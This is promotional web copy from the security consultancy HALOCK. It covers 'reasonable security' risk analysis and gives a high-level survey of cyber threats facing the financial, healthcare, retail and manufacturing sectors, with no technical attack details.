Risk is always a part of your cyber strategy. It evolves based on your environment. It could be calm one moment, then a disastrous storm the next. The key to managing risk is to continually take care of your critical business areas and all interested parties.
REGULATORY UPDATE: The SEC’s new rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure require public companies to describe their cybersecurity programs in their periodic reporting and how they manage RISK.
But how do you manage the needs of many with different priorities?
By establishing reasonable security through the Duty of Care Risk Analysis (DoCRA). Duty of care requires that organizations demonstrate they used controls to ensure that risk was reasonable to the organization and appropriate to other interested parties at the time of the breach. This approach enables users to:
Prioritize security investments
Consider the needs of all interested parties
Demonstrate that the risk is ‘Acceptable’ or ‘Reasonable’
Protect the organization without overly burdening it
Continuously manage to ‘enough’ security
Manage your cyber insurance coverage appropriately
We also incorporate the Sedona Conference’s “Test for Reasonable Security Controls” establish that safeguards must not pose a higher risk to the organization than the lack of safeguardsposes to others. By balancing an organization’s mission, objectives, and obligations, your risk strategy will have the appropriate balance of compliance, security, and corporate responsibility. You will be practicing ‘reasonable security’.
HALOCK, a privately owned and operated company based in Schaumburg, IL, helps organizations across all industries determine their acceptable level of risk to establish the reasonable and appropriate “duty of care” when it comes to cybersecurity. We serve clients of different sizes, including mid-sized to large Fortune 100 companies, in industries such as healthcare, financial services, nonprofits, startups, energy, retail, payment processors, manufacturing, IT, education/academic, communications, government, and supply chains. HALOCK partners with organizations to define their reasonable security controls based on a company’s mission, objective, and social responsibility.
The Sedona Conference – an influential think tank that advices attorneys, regulators, and judges on challenging technical matters – just released its Commentary on a Reasonable Security Test. The Commentary is the first document of its kind that provides the legal community with a clear definition of a “reasonable” security control.
HALOCK’s Chris Cronin was a co-author of Commentary on a Reasonable Security Test. To learn how to apply the test, contactus.
When clients face cybersecurity challenges they need the right combination of experts to advise them, as cybersecurity risks are not exclusively a legal, business, or technical challenge. Risks can be created on corporate boards, in the C-Suite, within technical systems, or in the hands of end-users. Moreover, impacts can occur during a breach, or after a regulator reviews a case. And because cybersecurity risk and compliance is multi-disciplinary, advisors must capably address many specialized subjects at once to serve their clients well.
UPDATE: The SEC’s new rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure require public companies to describe their cybersecurity programs in their periodic reporting and how they manage RISK.
Reasonable Security is Defined
The Sedona Conference – an influential think tank that advises attorneys, regulators, and judges on challenging technical matters – released its Commentary on a Reasonable Security Test. The Commentary is the first document of its kind that provides the legal community with a clear definition of a “reasonable” security control.
HALOCK’s Chris Cronin was a co-author of Commentary on a Reasonable Security Test. To learn how to apply the test, contact us.
What is Reasonable Security for You or Your Client?
HALOCK Security Labs partners with attorneys and law firms to support clients for regulatory, strategic, and litigation matters using due care and reasonable person principles. HALOCK has pioneered an approach to risk analysis that aligns with regulatory standards for “reasonable” and “appropriate” safeguards and risk, and judicial “multifactor balancing tests” in data breach law suits. HALOCK has produced two emerging standards for cybersecurity risk management to promote our approach; the DoCRA Standard (Duty of Care Risk Analysis) maintained by the DoCRA Council, and CIS RAM (Risk Assessment Method) distributed by the prestigious Center for Internet Security.
By partnering with HALOCK, law firms expertly advise and represent their clients on legal, regulatory, and strategic matters while effortlessly demonstrating how clients’ complex technical decisions are defensibly reasonable.HALOCK is headquartered in Schaumburg, IL, in the Chicago area and advises clients on duty of care, regulatory compliance, and reasonable information security throughout the US.
There is an old proverb that Generals and soldiers are always prepared to fight the last war. This has proved true on a number of occasions throughout history. Winston Churchill wrote in his biography, “It is a joke in Britain to say that the War Office is always preparing for the last war.”1 This demonstration of the last war mentality can be traced to the days of Napoleon who consistently beat opponents who tried fighting the “last war.” The same can be said for cybersecurity as well.
Organizations are consistently fighting the “last threat,” unaware that the changing landscape of cyber threats and tactics has already changed. It isn’t just the fact that cyber threats are changing, it is the pace of this change that is further unsettling. During the first six months of 2017, ransomware was identified as the #1 cybersecurity threat amongst industry leaders. The WannaCry and NotPetya attacks over the summer of 2017 garnered headlines across the world as some of the largest global corporations were brought down for days and weeks. Yet, within the course of one year, an entirely new threat called Cryptomining had eclipsed ransomware of its #1 stature. The tidal threats of ransomware appeared to recede as fast as its tsunami like entrance onto the world stage. This sudden transition was due to several reasons such as the skyrocketing price of Bitcoin and other cryptocurrencies as well as the growing propensity of ransomware victims to not pay up. These changing dynamics helped propel cryptomining attacks to increase by as much as 10,000 percent in some parts of the world in late 2017.
Those who singularly focused on ransomware were unprepared for cryptomining, and those who have singularly focused on this recent cyber threat, will miss the next one. Even now, the threat of cryptomining is diminishing, giving way to bank trojans and the rise of ransomware While this constant “changing of the guard” plays out for all industries, just what the next threat is depends on the industry you are in. Below we will look at some of the different threat types for each industry.
Different industries face different types of threats for a number of reasons, one being that they use a unique technology or process that is singular to them only. An example is the network of automatic teller machines that are ubiquitously present today. In January of 2018, the U.S. Secret Service began warning banks about a wave of new attacks referred to as Jackpotting. Jackpotting is a type of attack in which thieves install malicious hardware/software at ATMs that force the machines to dispense large volumes of cash on demand. While U.S. banks have been exempt from this attack methodology that has plagued other parts of the world, it has now made its way to the states. In the end of course, an ATM is nothing more than a computer – a computer that happens to be connected to a hoard of cash. As veteran cyber security professionals know all too well, it is hard enough to protect an ordinary workstation at a bank.
While every industry sector needs to prioritize its efforts to thwart cyber security threats, the financial sector must consume itself with this task more than others. The reason is simple. Financial services firms fall victim to cyber security attacks 300 times more frequently than businesses in other industries and incur a greater cost of cleanup and recovery. Some of these threats are obvious such as the inherent vulnerability of online bank accounts. According to Kaspersky Lab, the installation of banking malware apps reached a historic high in the second quarter of 2018 (61,000). Banking Trojans are now the leading cyber security threat for financial institutions and their customers as banking trojans accounted for nearly 59 percent of all malicious email payloads in the first quarter of 2018. Other less obvious points of vulnerability include the inherent dependency of banks on third-party service providers that provide digital services to augment their service platforms. According to a report by the U.S. Office of the Comptroller of the Currency, operational risk remains a main risk area for banks due to the growing complexity of their enterprises that constitutes a multi-layer security strategy.
While ransomware may not be the colossal cyber threat it once was, that is not the case when it comes to the healthcare industry. According to a poll commissioned last year that included 1,758 U.S. and Canada-based healthcare employees, 27 percent said they were aware of a ransomware attack against their employer within the past year. Even worse, of those who mentioned being aware of an attack, one third of them cited a repeated attack. In 2017, 45 percent of all ransomware attacks targeted the healthcare sector compared to only 12 percent for the financial services industry.
Ransomware attacks are not always deployed in order to garner extortion money. According to the U.S. Department of Health and Human Services, there were more than 100 cybersecurity incidents in 2019 that affected more than 500 individuals. Ransomware was a common thread in many of these attacks as cyber criminals now use ransomware as a way to cover their tracks after a breach.
Ransomware isn’t the only threat that the industry faces. The growing use of medical devices has increased the attack surface of healthcare organizations. According to the Food and Drug Administration, medical device vendors reported 400 percent more vulnerabilities per quarter last year. Medical devices are plagued with outdated operating systems, out-of-date firmware and even a dearth of authentication processes. All of this has induced the FDA to issue guidance for connected medical device security.
When one thinks of security threats singular to the retail industry, one usually thinks of skimming. Whether it is a clerk skimming one’s card for an added transaction or a strain of Point of Sale (POS) malware that allows hackers to remote in and take over these devices, skimming continues to be a common threat to retail establishments. But skimming isn’t just about POS machines. Thanks to malicious code threats such as Magecart, hundreds of thousands of credit card accounts have been exposed to hackers. Magecart is a decentralized global campaign that uses the mage.js script to steal credit card information from online shoppers. This isn’t the only cyber threat that online retailers must worry about. According to the Verisign Q2 2018 DDoS Trends Report, DDoS attacks increased by 35 percent, with the average size of the attacks increasing 111 percent year over year. Contrary to popular conception, DDoS attacks don’t just affect large retail conglomerates. A DDoS attack on a large online retailer equally affects those third-party retailers that depend on it. Similarly, an attack on a single payment services provider can devastate hundreds or even thousands of retailers in a single instance.
According to the Cisco 2017 Annual Cybersecurity Report, nearly one in three retailers suffered revenue losses in 2016 as a result of a cyberattack. Sadly, just 52 percent of retail organizations consider their security infrastructure to be up-to-date and upgraded with the best technology tools. Retail more than any other business sector must defend itself against both the localized small time criminal as well as sophisticated international hacking organizations.
In some ways, manufacturing is one of the final industries to begin the digital transformation process. While Manufacturers are enjoying the advantageous leaps in productivity and innovation that the digitalization can bring, they are also discovering the resulting vulnerabilities to cyberattacks as well. According to the National Center for Manufacturing Sciences, manufacturers have traditionally relied on physical isolation as a way to secure assets, an approach that no longer works in an environment dominated by digital sensors and Internet of Things (IoT) devices. A recent survey by Deloitte found that only half of companies isolate their Industrial Control System from their standard networks, opening themselves up to risk. A study commissioned by IBM showed that 87 percent of automotive manufacturers are quick to implement IIoT (Industrial Internet of Things), but slow to secure it.
Today’s smart factory isn’t just about digital devices; it is about connected devices. The burgeoning IoT connected ecospheres vastly increase the attack surface of today’s industrial complexes. While manufacturers may be new to the concept and practices of cybersecurity hygiene, their hacking adversaries are not. The thirst to acquire intellectual property in order to reduce competitive advantages is a driving force in nation state backed attacks. As a result, a generic cybersecurity plan isn’t enough for those in the manufacturing sector. As a recent article in CSO Magazine stated, “Are you nation state “defense ready?”
Not Just Controls, the Right Controls
Nearly every company and organization today knows they need some type of security controls in order to defend against cyber threats today. But merely having controls isn’t enough. It’s about having the right controls. You need the right tools, supported by the proper strategies to combat the threats of tomorrow, not just the past. Just as important however, is the knowledge to understand the threats that are specific to your industry and business – what is reasonable security in your world? And how do you implement reasonable threat management?
One of the ways to accomplish this is to establish a HALOCK Industry Threat (HIT) Index. An HIT conducted by HALOCK can provide keen insights, recommendations and direction into what you need to do to secure your particular enterprise from the risks you will face both today, and tomorrow. HALOCK can review your controls in the context of industry specific threats. In addition, they can provide gap and risk assessments, penetration tests, incident response planning and compliance audits. The speed in which cyber security threats transform and evolve continues to accelerate. You don’t have time to keep up with the hastening pace of threat innovation, because HALOCK already does. Benefit from HALOCK’s HIT cyber security threat intelligence. They specialize in key industries and business sectors and have the understanding and knowledge base to secure your enterprise in a way that can not only keep your users and devices safe, but serve as a competitive advantage as well. Analysis is key. Ask yourself, “Was the data breach foreseeable?“
HALOCK is a U.S.-based information security consultancy that is privately owned and operated out of its headquarters in Schaumburg, Illinois. From mid-sized to the Fortune 100, our clients span a variety of industries including financial services, health care, legal, manufacturing, supply chains, education, energy, SaaS/cloud, enterprise retail and many others. HALOCK strives to be your security partner, providing both strategic and technical security offerings. We combine strong thought leadership, diagnostic capabilities and deep technical expertise with a proven ability to get things done. HALOCK helps clients prioritize and optimize their security investments by applying just the right amount of security to protect critical business assets while satisfying compliance requirements and corporate goals. As principal authors of CIS Risk Assessment Method (RAM) and board members of The Duty of Care Risk Analysis (DoCRA) Council, HALOCK offers the unique insight to help organizations define their acceptable level of risk and establish “duty of care” for cybersecurity. Through this risk assessment method, businesses can evaluate cyber risk that is clear to legal authorities, regulators, executives, lay people, and security practitioners. Services: Security Management, Risk Management and CIS RAM and DoCRA Risk Assessments, Mergers and Acquisitions (M&A) Risk & Cybersecurity Due Diligence, Compliance Validation (HIPAA, PCI DSS, Privacy, CMMC), Pen Testing (External Network, Internal Network, Wireless, Web Application, Social Engineering, Remediation Verification, Pen Testing Program), ISO 27001, Incident Response (Live Breach Response, Incident Response Plan, Incident Response Training, Technology Review, Run Books, SLA, Compromise Assessment, Security Engineering (Security Architecture Review, O365 Azure Security Architecture Review, Threat Hunting or MDR, HALOCK Industry Threat (HIT) Index, Security Products).
Get Access to HALOCK Cybersecurity and Risk Resources
Leverage our cybersecurity and risk resources – presentations, articles, infographics, checklists, case studies, educational posters and more. Visit this page often — we’re always adding new content and guidance on reasonable security!
HALOCK Security Labs helps companies develop a strategy to protect and defend their sensitive data, intellectual property and private information from malware, hackers and other cyber attacks. Based on Duty of Care Risk Analysis (DoCRA), our information security services are custom-built to meet the unique needs of every client, providing exactly the IT protection each of our clients requires, while helping them stay ahead of the threat landscape. HALOCK helps you develop reasonable safeguards and establish acceptable risk based on your company’s mission, social responsibility, and compliance requirements.
HALOCK Breach Bulletins Read HALOCK overviews and analyses about recent data breaches to understand what are common threats and attacks that may impact your organization – featuring description, indicators of compromise (IoC), containment, and prevention.